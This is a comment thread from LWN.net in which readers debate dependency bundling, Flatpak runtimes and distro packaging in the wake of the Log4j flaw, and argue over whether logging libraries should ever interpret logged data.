Yeah, that's rare success. Of GlibC developers, not distro makers, though. Everyone else liked to play CADT games which made the desire of distro-makers to have just one copy of each library unrealistic: where there are no compatibility between versions there would be bundling… it's as simple as that.

Yet distributors tried to fit that square peg into a round hole for decades… with very little success.

I'm also guilty: I tried to help with creation of one local distribution, years ago, got fed up with all these incompatibilities (when we tried to somehow invent a way to run apps from RedHat on our distro) and switched back to Windows.

Dependency bundling

Posted Dec 20, 2021 18:36 UTC (Mon) by NYKevin (subscriber, #129325) [Link]

> Everyone else liked to play CADT games

Side note: As someone who was actually diagnosed with AD(H)D, I really wish people would stop using my condition as a pejorative.

Or claiming that it doesn't exist, for that matter.

Dependency bundling

Posted Dec 19, 2021 13:36 UTC (Sun) by smurf (subscriber, #17840) [Link] (1 responses)

Yeah, and then you have a library linked against FooLib 3.2, another library using FooLib 3.3, and no way to prevent these two from stepping on each others' toes when you try using them in the same application.

The Distribution approach ("there is exactly one copy of FooLib on the system which everybody uses, it gets security fixes only; if you need a newer copy you get to wait for the next distro release") may not be for everybody but at least it solves *that* problem.

Dependency bundling

Posted Dec 19, 2021 13:49 UTC (Sun) by khim (subscriber, #9252) [Link]

> Yeah, and then you have a library linked against FooLib 3.2, another library using FooLib 3.3, and no way to prevent these two from stepping on each others' toes when you try using them in the same application.

Of course there are ways to prevent that! Windows never had that problem in the first place. And Android implements a way solve it.

Not sure what macOS is doing, but hope it's either avoided the problem in the first place (like Windows) or solved it (like Android).

> The Distribution approach ("there is exactly one copy of FooLib on the system which everybody uses, it gets security fixes only; if you need a newer copy you get to wait for the next distro release") may not be for everybody but at least it solves *that* problem.

True. If your sausage is raw and under cooked then go and burn the whole house down. That sure would solve that issue: most likely you would have no sausage to worry about, but if it would, by some freak chance, survive then it would be well done.

Dependency bundling

Posted Dec 18, 2021 1:01 UTC (Sat) by pabs (subscriber, #43278) [Link]

Not all developers have abandoned this model. At my workplace the rule is that everything must be in Debian packages in our internal repo and the open source ones have to be pushed back to Debian and removed from our internal repo when that is done. I expect there are other companies that also do something like this.

Dependency bundling

Posted Dec 18, 2021 4:23 UTC (Sat) by sionescu (subscriber, #59410) [Link] (1 responses)

Those young programmers who "create the systems the users love to use" will end up with a system that is a nightmare for software maintenance and security because their whole approach to dependencies is to run "npm update" (or the Ruby/Python) equivalent every now and then. If they get acquired by a large company, the biggest M&A risk is that they will have to do a major refactor or even rewrite in order to fix that mess.

Dependency bundling

Posted Dec 19, 2021 14:28 UTC (Sun) by khim (subscriber, #9252) [Link]

> If they get acquired by a large company, the biggest M&A risk is that they will have to do a major refactor or even rewrite in order to fix that mess.

Highly unlikely. More likely: they would be told to make sure CI/CD can run without internet access and that would be it.

The solution is to take all the bazillion dependencies and put them into one repo. Then never update.

You may guess how wonderfully this would improve security of the whole thing.

Dependency bundling

Posted Dec 16, 2021 21:44 UTC (Thu) by hkario (subscriber, #94864) [Link] (3 responses)

But if you tell the developers that the production doesn't have the absolute most recent, bleeding edge, version of a package, they will say that they literally can't do their job. /s

Dependency bundling

Posted Dec 17, 2021 20:46 UTC (Fri) by khim (subscriber, #9252) [Link] (2 responses)

That also makes sense. If you found a bug in a library you are using (not too serious like what you have in log4j thus without the need to rush and upgrade everything ASAP) and you have fixed it in the base version of package… then it may take years before you would be able to rely on that fix. And that just silly: you need to ship working program much sooner.

Bundling is the obvious solution. Maybe not best solution although… well… what other solution is there? Bundle version which works and use system version if it's new enough? This leads to combinatorial explosion very quickly and makes everything unreproducible and untestable.

Dependency bundling

Posted Dec 21, 2021 15:16 UTC (Tue) by Chousuke (subscriber, #54562) [Link] (1 responses)

Years? Build your production software on a platform that has support. With RHEL, you would pay Red Hat for support; something blocking your development? Open a support ticket with Red Hat and have it fixed. If you're building for RHEL, you might even have a koji setup for your packages so you could also build a custom, patched RPM if RHEL support somehow takes too long. It's not difficult.

If you vendor dependencies, you assume full responsibility for monitoring those dependencies. With a distribution, you only need to monitor what the distribution does. A security issue in a dependency provided by the distribution is not on you to find and fix.

Sure, you might be limited to using older versions of some dependencies depending on which platforms you support. That is not automatically a downside.

Your software does not need to support every platform under the sun when run in production; it's perfectly fine to tell someone that you only provide upstream production support for eg. RHEL 8 or newer, Ubuntu 20.04 or newer, and nothing else.

If you're an open source project, you would publish releases in source form and let distributors take care of it; maybe engaging with a few platforms that you want to explicitly support to get your software packaged.

I don't know why it seems to be so common to think that once you write software it should run on some random hyper-customized Gentoo-NixOS frankenstein of a platform just because it's "Linux".

Dependency bundling

Posted Dec 21, 2021 18:55 UTC (Tue) by khim (subscriber, #9252) [Link]

> Build your production software on a platform that has support.

Who would pay for it?

> If you vendor dependencies, you assume full responsibility for monitoring those dependencies.

No. Why should you? They are bundled, they don't change, they work.

> With a distribution, you only need to monitor what the distribution does. A security issue in a dependency provided by the distribution is not on you to find and fix.

Most people (including most developers) spend maybe 5 minutes a year thinking about security. 15 is you lucky. You may not like it, but that's how it works.

They can not (and wouldn't!) pick any solution which asks them to regularly “monitor” something.

Thus they bundle dependencies since that works. As examples with Andoid/DirectX/ChromeOS shows they may accept unbundled solution where someone else monitors things

But if you say “for this solution to work developers have to monitor XXX”… then it does't even matter what XXX is: developers can not and wouldn't monitor it. Period. Not even worth discussing.

They are paid for to solve users problems not to monitor anything!

> Your software does not need to support every platform under the sun when run in production; it's perfectly fine to tell someone that you only provide upstream production support for eg. RHEL 8 or newer, Ubuntu 20.04 or newer, and nothing else.

What about most common type of software which is updated never and not supported unless something breaks and you are forced to visit freelance site and find someone who may fix it?

> I don't know why it seems to be so common to think that once you write software it should run on some random hyper-customized Gentoo-NixOS frankenstein of a platform just because it's "Linux".

Why shouldn't it? Any OS is only as good as software which it enables. And the majority of software is only ever written once, updated never and used till it breaks.

Just one simple fact: there are more than 30 million businesses in US. And population is 330 million. Just what kind of software may typical business afford? Just think about it. The answer is: very simple one. Which requires maybe week of work of a software developer (but it would be nice if it would require less).

And then you come and say: you have to monitor that and you have to support this. How? Who would pay for that? Are you offering? For all these millions of businesses?

And before you come and say that most of these businesses don't purchase any software. Of course they do! They have their own [tiny] web sites with some scripts cobbled together from Google Docs and some frankenstein on VPS. They have some scripts for Excel or Accees.

All that is software, too. And, the most important part: there are no hard line which separates that software from something like WhatsApp. There are continuum of software between these hairy Excel scripts and auto-updating browser with dozens of software engineers.

And the majority of software is closer to Excel scripts than to said browser. Even if scripts are built on top of JavaFX in a system which uses log4j.

Dependency bundling

Posted Dec 16, 2021 22:08 UTC (Thu) by rgmoore (✭ supporter ✭, #75) [Link] (1 responses)

I hope that after these fires have been put out we all sit down and have a serious re-think about the downside of bundling dependencies.

It would indeed be great if people learned this, but this isn't the first time there's been a critical security flaw with a bundled dependency. If people didn't change after the last time this happened, it requires great optimism to think they'll change this time. There are deep reasons people like bundling, and we need to work on those reasons before they'll be convinced to change.

Dependency bundling

Posted Dec 19, 2021 11:44 UTC (Sun) by farnz (subscriber, #17727) [Link]

This is where good systems for handling bundling come into play. For example, Fedora RPMs that include bundled packages have metadata that indicates what you bundled, and what version is bundled.

On the developer side, Rust's Cargo tool is set up so that the easy way to bundle a dependency is to document it in your build metadata and ask Cargo to copy it in. This sort of thing makes it relatively manageable to unbundle dependencies - you know what was bundled (thanks to Cargo's metadata files), and can compare that to what you have bundled to see if there are hidden changes.

Dependency bundling

Posted Dec 17, 2021 5:38 UTC (Fri) by bartoc (guest, #124262) [Link] (1 responses)

Have you actually looked at what's required to "unbundle" dependencies for java programs, it's .... not pretty, and has burned out quite a few distro maintainers.

I agree though, build systems really do need to support unbundling. Java build systems in particular are a nightmare though, some make autotools look genuinely simple and pleasant!

Dependency bundling

Posted Dec 17, 2021 16:47 UTC (Fri) by seyman (subscriber, #1172) [Link]

Let's start small, then...

It would be great if applications that package dependencies could include a MANIFEST-like file that documents their depencies. For each one, it could state what version is bundled, if it has been modified from upstream's version and why it is bundled.

That alone would be a huge step forwards.

Dependency bundling

Posted Dec 17, 2021 8:12 UTC (Fri) by nirbheek (subscriber, #54111) [Link] (6 responses)

Small correction: Flatpak apps do not bundle their own dependencies. They pick them up from "runtimes" which are bundles of libraries that are shared between Flatpak apps.

So if you install 5 apps using rpm and 10 apps with Flatpak, you will only have two copies of a library — except if an app requires an older runtime for compatibility reasons, but that's not a new problem.

Dependency bundling

Posted Dec 17, 2021 9:14 UTC (Fri) by z3ntu (subscriber, #117661) [Link] (2 responses)

That's only if the dependency is included in the runtime. Many more esoteric dependencies (or just anything except base libs) are bundled in each and every flatpak app on its own. E.g. for VLC flatpak you can see a long list of bundled dependencies here: https://github.com/flathub/org.videolan.VLC/blob/master/o... If a security vulnerability is found in e.g. libssh2 then the VLC flatpak needs to be fixed on its own and all other flatpaks bundling libssh2 as well.

Dependency bundling

Posted Dec 17, 2021 14:23 UTC (Fri) by nirbheek (subscriber, #54111) [Link] (1 responses)

Like you say, esoteric dependencies are the main candidate for bundling, which seems fine to me from a security perspective.

For things like libssh2, I would want Flatpak / Flathub to have a system for checking whether multiple apps on the repo have the same dependency, so that it can either be added to an existing runtime, or a new runtime can be created that contains it. It might already have such a system, since it's easy to automatically detect it from the app manifests.

Dependency bundling

Posted Dec 17, 2021 16:48 UTC (Fri) by nim-nim (subscriber, #34454) [Link]

> Like you say, esoteric dependencies are the main candidate for bundling, which seems fine to me from a security perspective.

One man’s esoteric dependency is another’s must-have.

The JVM is the archetypical runtime, it bundles all kinds of features so Java devs need not use any esoteric dependency, fast forward a few decades and Java devs use everything except what is bundled (log4j is not the sole example).

The batteries included runtime model only works at first, when it is new and shiny and app dev interests are perfectly aligned with runtime dev interests (mainly because there is nothing else but the runtime to choose from).

Over time runtime devs will be reluctant to deprecate runtime parts (because of the installed base), they will clash with people proposing alternatives (because they, as official runtime devs, know best) so there is a natural drift of app devs towards “esoteric” runtime alternatives.

The ultimate result of a successful runtime is lots of people using esoteric deps (aka runtime alternatives). And that ultimate result is better served by a granular dependency system, not a battery-included model that posits perfect runtime dev and app dev alignment on the long run.

That’s not a reflection on specific human beings that’s how we behave in general.

Dependency bundling

Posted Dec 17, 2021 10:40 UTC (Fri) by zdzichu (subscriber, #17118) [Link] (2 responses)

With Flatpak, after some time, you will have more copies of the library. Because there is apparently no garbage collection of old runtimes:
Fedora Platform    org.fedoraproject.Platform     34       f34    fedora    system
Fedora Platform    org.fedoraproject.Platform     35       f35    fedora    system
Freedesktop Platf… org.freedesktop.Platform       20.08.15 20.08  flathub   system
Freedesktop Platf… org.freedesktop.Platform       21.08.4  21.08  flathub   system
Mesa               …eedesktop.Platform.GL.default 21.1.7   20.08  flathub   system
Mesa               …eedesktop.Platform.GL.default 21.2.2   21.08  flathub   system
Intel              …edesktop.Platform.VAAPI.Intel          20.08  flathub   system
Intel              …edesktop.Platform.VAAPI.Intel          21.08  flathub   system
ffmpeg-full        …edesktop.Platform.ffmpeg-full          20.08  flathub   system
ffmpeg-full        …edesktop.Platform.ffmpeg-full          21.08  flathub   system
GNOME Application… org.gnome.Platform                      3.38   flathub   system
GNOME Application… org.gnome.Platform                      40     flathub   system
GNOME Application… org.gnome.Platform                      41     flathub   system
Of course non-used runtimes are not a threat. They occupy disk space only.

Dependency bundling

Posted Dec 17, 2021 12:12 UTC (Fri) by atnot (subscriber, #124910) [Link] (1 responses)

There is garbage collection of runtimes, but only when they become EOL. IIRC the thinking is that repeatedly having to wait for them to be re-downloaded is usually more annoying than them using a bit of disk space. You can still garbage collect them manually with `flatpak uninstall --unused` though.

Dependency bundling

Posted Dec 18, 2021 21:45 UTC (Sat) by JanC_ (guest, #34940) [Link]

A “bit” of disk space that can grow to eat half the available disk space on some systems…

It’s basically just insane to keep filling up disk space with (often unused!) runtimes.

snaps & flatpaks...

Posted Dec 19, 2021 15:40 UTC (Sun) by Herve5 (subscriber, #115399) [Link]

>>But even in the Linux world we're leaning more and more on snaps and flatpaks, making such problems more likely there, too.
My thoughts exactly...

Lessons from Log4j

Posted Dec 16, 2021 21:20 UTC (Thu) by ibukanov (subscriber, #3942) [Link] (2 responses)

The question is why one needs to depend on a separated logging library in Java in the first place? Java these days should include plenty of logging options.

Lessons from Log4j

Posted Dec 17, 2021 5:33 UTC (Fri) by joib (subscriber, #8541) [Link] (1 responses)

There is java.util.logging shipped as part of the JDK, but apparently it sees little usage compared to log4j.

Lessons from Log4j

Posted Dec 18, 2021 23:06 UTC (Sat) by gfernandes (subscriber, #119910) [Link]

Log4j itself fell out of favour some time back. Most not so modern java projects use Logback, with a bridge t the log4j API to allow application components that need log4j, to work.

Needless to say, Logback is not vulnerable in the same way.

Lessons from Log4j

Posted Dec 17, 2021 7:07 UTC (Fri) by iabervon (subscriber, #722) [Link] (3 responses)

One thing I haven't been able to determine (having never used log4j 2) is whether lookups in messages are actually intended functionality at all. The manual only seems to mention that you can use them in configuration (and if attackers are writing your logger configuration, you've already got problems that are probably easier to exploit than RCE). The documentation of logging functions says that it does handle formatting, but only out of the arguments passed to the function. So I'm confused that they seem to be trying to remove hazardous lookups from the lookup environment, rather than just not using a string processing function with unexpected behavior for the strings that are untrusted input. Are people relying on any lookups in messages for legitimate use?

Check the Wayback Machine

Posted Dec 17, 2021 23:52 UTC (Fri) by tialaramex (subscriber, #21167) [Link] (2 responses)

The next highest priority after fixing the code was to fix and replace the documentation.

A month ago, Apache Log4j2's documentation proudly explained that lookups, including recursive lookups were a great feature and that although a mechanism was provide to turn them off, you should think twice before doing so. When 2.15.0 shipped that was gone, and the documentation explained what was true all along, that this is incredibly dangerous and you shouldn't do it, but it was available if you needed it. I assume this was further refined for 2.16.0 If you're wondering what it used to look like, check the Wayback Machine as I did.

Java thinks the variable userName I got from my HTTP endpoint, and the string literal "User {} not found" are the exact same kind of thing, Strings. So even if they told Java developers not to write log(userDefinedValues) they couldn't put any force behind such a requirement. And since the rest of Java lacks format handling, it's pretty usual for Java programmers to write("stuff" + like + " " + this) or, if they're more disciplined, use a StringBuilder to reduce the amount of allocation overhead, both of which ensure that even if you pretend your interface is log(format, param1, param2, param3) it's always used as log(userDefinedValues) anyway because the user smashes everything into a single String before even trying to log it.

As I understand it, in Swift you can say, this parameter must be a string literal, and when the programmer tries to log(userDefinedValues) that doesn't compile because the type doesn't match. In Rust, you can't do that, but they luck out because their formatting is built out of macros, and so the *macro* language needs to parse the format which must happen at compile time, as a result format!(userDefinedValues) won't compile whereas format!("{}", userDefinedValues) does what you want and isn't confused by whatever is in userDefinedValues at runtime.

Check the Wayback Machine

Posted Dec 18, 2021 7:13 UTC (Sat) by iabervon (subscriber, #722) [Link]

The only place I can find a mention of Lookups in messages in the month-ago version of the documentation was in the middle of the long "Configuration" page, where it said that it was on by default and how to turn it off. I'm only finding a suggestion that you should write your code with Lookups in configuration files and toString() and Formatter-style substitution in your messages, and both of these are reasonably safe (if you stick user-supplied data in a Formatted-style substitution, you may get an exception when it references more arguments than the call has, but it can't do anything other than sensible conversions of arguments passed to the function, and there normally just won't be any if you were building the text yourself).

It looks like there was a suggested feature of configuring your output layout to include looking things up in a context, and this was also insecure due to the recursive nature of lookups, but that wasn't the default configuration problem that's hitting everything that used log4j2.

Check the Wayback Machine

Posted Dec 24, 2021 7:34 UTC (Fri) by spigot (subscriber, #50709) [Link]

Interestingly, in late November JEP draft: Templated Strings and Template Policies (Preview) was updated. As one of its goals it lists:
  • Templated string injection attack prevention will be of primary concern. The result of template processing can to [sic] be used in sensitive applications, such as database queries. Validation of templates and expression values prior to use can prevent catastrophic outcomes.
Hopefully the Log4j 2 incident will provide an impetus for this work.

Lessons from Log4j

Posted Dec 17, 2021 15:54 UTC (Fri) by nim-nim (subscriber, #34454) [Link] (10 responses)

> Normally, one thinks that a logging utility should accept data of interest and reliably log it. Log4j seemingly does this, but it also does something that, arguably, no logging system should do: it actively interprets the data to be logged and acts upon it.

Any semi-useful logging system will do that. The data produced by the logger is minimal (logging is expensive), you need to complete it with something else for it to be useful, you can not defer completing because something else’s state also changes over time, completing requires some parsing of the data being completed.

That was already the case for paper sailor logs, sailors would log all kind of things (such as weather) in addition to their own decisions, and the logs would link all that data (interpret things).

Log4j’s failure is not in interpreting logged data, Log4j’s failure is first in failing to sanitize logged data before interpreting, and second in accepting to use non-vetted external third party code for the interpreting.

Lessons from Log4j

Posted Dec 17, 2021 17:16 UTC (Fri) by MarcB (guest, #101804) [Link] (6 responses)

How does enriching logs require parsing them?

Usually a logging system will have the raw message, some additional static information (like severity) and some dynamic information (like timestamp, scope, PID, ...). All of this is inherently trustworthy.
None of this even requires looking at the raw message. All a sane log system will do, is enforcing some limits on it (size, output encoding, ...).

The root cause of this mess is that Log4j went further and actually started interpreting the raw data. If there is any lesson to be learned here, it is "respect complexity".

Lessons from Log4j

Posted Dec 18, 2021 17:51 UTC (Sat) by nim-nim (subscriber, #34454) [Link] (5 responses)

>How does enriching logs require parsing them?

Pretty much every time some info is replaced by expanded values or compared with some other info source (user name instead of user id, FQDN instead of IP, numeric timestamp with full local time, outcome of processing node A with outcome of processing node B).

The raw local numeric values the logger process captures are not terribly useful as-is.

The only thing that changes is the amount of parsing and reprocessing (see also syslog pipelines, this was not invented yesterday).

Lessons from Log4j

Posted Dec 18, 2021 23:10 UTC (Sat) by gfernandes (subscriber, #119910) [Link]

Replacing variables with locally available data is one thing. Deciding to go over a url to fetch that data is a different thing altogether.

Lessons from Log4j

Posted Dec 20, 2021 9:32 UTC (Mon) by MarcB (guest, #101804) [Link] (3 responses)

> Pretty much every time some info is replaced by expanded values or compared with some other info source (user name instead of user id, FQDN instead of IP, numeric timestamp with full local time, outcome of processing node A with outcome of processing node B).

But that should never be parsed from the log message. The IP address or user id is already known to the logging application and then mapped via some pre-configured mechanism.

Lessons from Log4j

Posted Dec 20, 2021 10:07 UTC (Mon) by nim-nim (subscriber, #34454) [Link] (2 responses)

In simple setups mostly yes.

In more complex setups the bit that manipulates some data has no need to understand some of this data, but you still want the logs to expand it, because analysing problems needs more context.

So quite often logged data goes through some processing which the logged bit of code has no need of itself. People may hide this processing in another part of the app, in a third party lib, in plugins or even by invoking third-party executables shell-mode (all of those things may make remote network calls BTW). But this processing exists.

It’s the default history *nix approach BTW, unstructured logging with lots or reprocessing came before structured logs that force the log emitter to put its data into order (more) directly.

Lessons from Log4j

Posted Dec 20, 2021 15:04 UTC (Mon) by MarcB (guest, #101804) [Link] (1 responses)

Log processing afterwards is something else and out of the scope of log4j or any logging library.

And yes, ideally you would create structured logs - precisely to avoid having to parse the raw log message. Parsing unstructured logs is only acceptable if there is no better solution; i.e. when you cannot adjust the logging application. For a library like log4j - which is generating the logs in the first place - it makes no sense whatsoever.

For our in-house applications we have long since switched to a dual logging approach: classic unstructured logs stored locally and structured logs sent to logging infrastructure. The local logs would only be relevant in the (so far hypothetical) scenario of a major infrastructure outage.

Lessons from Log4j

Posted Dec 20, 2021 18:14 UTC (Mon) by nim-nim (subscriber, #34454) [Link]

The basic point is that most logged data needs massaging to be useful, no matter where you hide this massaging (in your own code, in a logging lib, in something invoked over jndi, in an external process).

The massaging is not an exception and would not exist without choices done logger-side.

Lessons from Log4j

Posted Dec 17, 2021 17:23 UTC (Fri) by smurf (subscriber, #17840) [Link] (2 responses)

> Log4j’s failure is not in interpreting logged data, Log4j’s failure is first in failing to sanitize logged data before interpreting

Wrong. It's RANDOM EXTERNAL DATA. There is no freakin' POINT in even TRYING to interpret ANY of it.

Sorry for shouting, but … is this really that hard to comprehend?

(In a sane world we would be 20 years past the obvious "well, obviously yes since log4j stepped into that one" answer …)

Lessons from Log4j

Posted Dec 18, 2021 18:19 UTC (Sat) by nim-nim (subscriber, #34454) [Link]

Don’t be ridiculous even something as basic as a web server or smtp server will do some processing of random externally supplied data if only to format, classify, cross-reference it and make sure the result is something that can be read later.

A raw unfiltered copy of external data is not a log it’s a capture (that will be interpreted by the capture viewer because raw data is useless as-is).

As with any processing of externally supplied data you need to check how the code that processes this data could be abused and sanitize the external data against it. That’s where log4j failed (in a gross way).

Lessons from Log4j

Posted Dec 21, 2021 11:46 UTC (Tue) by k8to (guest, #15413) [Link]

The point is, essentially, that sanitizing data is something you do when you want to ensure that the data fits within sane expectations so that your software can you know, operate on it.

From the perspective of a logging system, the text being logged is not something that should be "operated upon". That should be explicitly avoided.

Sanitization is never anywhere near as safe as simply not processing the data computationally at all.

The only thing you usually want to do to "sanitize" data in a logging system is make some decisions about how to handle really unexpected cases, like requests to log giant things like hundreds of kilobytes of data. Most logging systems simply truncate these after any formatting, or try to be clever and avoid unnecessary format building if the result will be unnecessarily large. But this is really just a subset of the "formatting" task, ie, placing various data blobs into the logged item. It is by no means needed in any way to take the data blobs and perform any computational tasks beyond "turn into string.

In a sane logging system, and language "turn into string" is not something that can trigger unexpected call paths.

random comment

Posted Dec 18, 2021 20:07 UTC (Sat) by linuxjacques (subscriber, #45768) [Link]

This word "random" - I don't think it means what you think it means.


Copyright © 2021, Eklektix, Inc.
This article may be redistributed under the terms of the Creative Commons CC BY-SA 4.0 license
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds